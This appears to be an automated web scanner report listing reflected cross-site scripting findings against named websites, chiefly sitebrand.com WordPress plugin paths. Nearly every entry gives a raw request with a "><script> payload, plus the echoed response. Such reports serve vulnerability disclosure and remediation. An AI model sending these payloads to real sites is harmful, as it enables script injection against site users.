GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle8fe3b"><a>180a3258f33 HTTP/1.1 Host: www.rentalhomesplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f87d"%3b2b465d35770 was submitted in the partner parameter. This input was echoed as 2f87d";2b465d35770 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle2f87d"%3b2b465d35770 HTTP/1.1 Host: www.rentalhomesplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_AptHead">
<!--BEG ...[SNIP]... cpropnum = "311374.7"; var dcarea = accarea.replace(".","").toLowerCase(); var dccomm = acccomm.replace(".","").toLowerCase(); var dcam = ""; var dcbeds = ""; var dchtype = ""; var dcaff = "oodle2f87d";2b465d35770"; var dpropnum = accpropnum.replace(".","_"); var keyvalues = "state="+dcstate+";reg="+dcreg+";area="+dcarea+";comm="+dccomm+";am="+dcam+";beds="+dcbeds+";htype="+dchtype+";aff="+dcaff+";propnum="+d ...[SNIP]...
1.264. http://www.sitebrand.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sitebrand.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9249"><script>alert(1)</script>aa8c58931bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9249\"><script>alert(1)</script>aa8c58931bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d9249"><script>alert(1)</script>aa8c58931bb=1 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:23:07 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <input type="hidden" name="redirect_to" value="/?d9249\"><script>alert(1)</script>aa8c58931bb=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d12"><script>alert(1)</script>a7a6bdc17b1 was submitted in the REST URL parameter 1. This input was echoed as 24d12\"><script>alert(1)</script>a7a6bdc17b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content24d12"><script>alert(1)</script>a7a6bdc17b1/plugins/contact-form-7/scripts.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content24d12\"><script>alert(1)</script>a7a6bdc17b1/plugins/contact-form-7/scripts.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6256"><script>alert(1)</script>5c269975e9c was submitted in the REST URL parameter 2. This input was echoed as c6256\"><script>alert(1)</script>5c269975e9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsc6256"><script>alert(1)</script>5c269975e9c/contact-form-7/scripts.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/pluginsc6256\"><script>alert(1)</script>5c269975e9c/contact-form-7/scripts.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34972"><script>alert(1)</script>25bc5b1264b was submitted in the REST URL parameter 3. This input was echoed as 34972\"><script>alert(1)</script>25bc5b1264b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/contact-form-734972"><script>alert(1)</script>25bc5b1264b/scripts.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:39 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-734972\"><script>alert(1)</script>25bc5b1264b/scripts.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133b"><script>alert(1)</script>4f7886d052a was submitted in the REST URL parameter 4. This input was echoed as 3133b\"><script>alert(1)</script>4f7886d052a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/contact-form-7/scripts.js3133b"><script>alert(1)</script>4f7886d052a HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-7/scripts.js3133b\"><script>alert(1)</script>4f7886d052a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b616e"><script>alert(1)</script>79b552272f5 was submitted in the REST URL parameter 1. This input was echoed as b616e\"><script>alert(1)</script>79b552272f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentb616e"><script>alert(1)</script>79b552272f5/plugins/contact-form-7/styles.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-contentb616e\"><script>alert(1)</script>79b552272f5/plugins/contact-form-7/styles.css" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dd52"><script>alert(1)</script>53de14fd4 was submitted in the REST URL parameter 2. This input was echoed as 3dd52\"><script>alert(1)</script>53de14fd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins3dd52"><script>alert(1)</script>53de14fd4/contact-form-7/styles.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins3dd52\"><script>alert(1)</script>53de14fd4/contact-form-7/styles.css" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48df5"><script>alert(1)</script>cdd3a670393 was submitted in the REST URL parameter 3. This input was echoed as 48df5\"><script>alert(1)</script>cdd3a670393 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/contact-form-748df5"><script>alert(1)</script>cdd3a670393/styles.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:38 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-748df5\"><script>alert(1)</script>cdd3a670393/styles.css" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32686"><script>alert(1)</script>68c143f9d2b was submitted in the REST URL parameter 4. This input was echoed as 32686\"><script>alert(1)</script>68c143f9d2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/contact-form-7/styles.css32686"><script>alert(1)</script>68c143f9d2b HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-7/styles.css32686\"><script>alert(1)</script>68c143f9d2b" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feabd"><script>alert(1)</script>a41f3158506 was submitted in the REST URL parameter 1. This input was echoed as feabd\"><script>alert(1)</script>a41f3158506 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentfeabd"><script>alert(1)</script>a41f3158506/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:34 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-contentfeabd\"><script>alert(1)</script>a41f3158506/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902ee"><script>alert(1)</script>0f50e1059ae was submitted in the REST URL parameter 2. This input was echoed as 902ee\"><script>alert(1)</script>0f50e1059ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins902ee"><script>alert(1)</script>0f50e1059ae/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins902ee\"><script>alert(1)</script>0f50e1059ae/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d242d"><script>alert(1)</script>08b7ab1b54a was submitted in the REST URL parameter 3. This input was echoed as d242d\"><script>alert(1)</script>08b7ab1b54a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/slidedeck-lite-for-wordpressd242d"><script>alert(1)</script>08b7ab1b54a/lib/slidedeck.jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:37 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpressd242d\"><script>alert(1)</script>08b7ab1b54a/lib/slidedeck.jquery.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9596"><script>alert(1)</script>144698515d8 was submitted in the REST URL parameter 4. This input was echoed as b9596\"><script>alert(1)</script>144698515d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/slidedeck-lite-for-wordpress/libb9596"><script>alert(1)</script>144698515d8/slidedeck.jquery.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:39 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/libb9596\"><script>alert(1)</script>144698515d8/slidedeck.jquery.js" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ac7"><script>alert(1)</script>8863cd0ea30 was submitted in the REST URL parameter 5. This input was echoed as 49ac7\"><script>alert(1)</script>8863cd0ea30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js49ac7"><script>alert(1)</script>8863cd0ea30 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js49ac7\"><script>alert(1)</script>8863cd0ea30" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1da0e"><script>alert(1)</script>0321b63fac9 was submitted in the REST URL parameter 1. This input was echoed as 1da0e\"><script>alert(1)</script>0321b63fac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content1da0e"><script>alert(1)</script>0321b63fac9/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:34 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content1da0e\"><script>alert(1)</script>0321b63fac9/plugins/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15055"><script>alert(1)</script>f8c0ae1a07a was submitted in the REST URL parameter 2. This input was echoed as 15055\"><script>alert(1)</script>f8c0ae1a07a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins15055"><script>alert(1)</script>f8c0ae1a07a/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins15055\"><script>alert(1)</script>f8c0ae1a07a/slidedeck-lite-for-wordpress/lib/wordpress-plugin.skin.css" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0bc"><script>alert(1)</script>69c5d7af925 was submitted in the REST URL parameter 3. This input was echoed as fe0bc\"><script>alert(1)</script>69c5d7af925 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
